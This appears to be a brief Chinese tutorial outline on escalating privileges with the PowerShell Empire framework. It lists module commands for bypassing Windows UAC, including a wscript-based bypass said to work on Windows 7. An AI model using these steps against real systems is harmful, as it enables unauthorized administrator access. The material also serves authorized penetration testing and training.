PowerShell渗透--Empire(二)
权限提升
-
- Bypass UAC
-
-
- usemodule powershell/privesc/bypassuac
-
-
-
- 设置listener
- execute
- list查看
-
-
-
- usemodule powershell/private/bypassuac_wscript (win7)
-
当运行完提权模块后,back返回agents查看,多了一个提权成功带(*)号的agents
usemodule powershell/private/bypassuac_wscript(win7)
该模块的原理是使用c:\windows\wscript.exe 执行payload,即绕过UAC实现管理员权限执行payload,只适用于win7系统,目前尚没有补丁,部分杀软会有提示。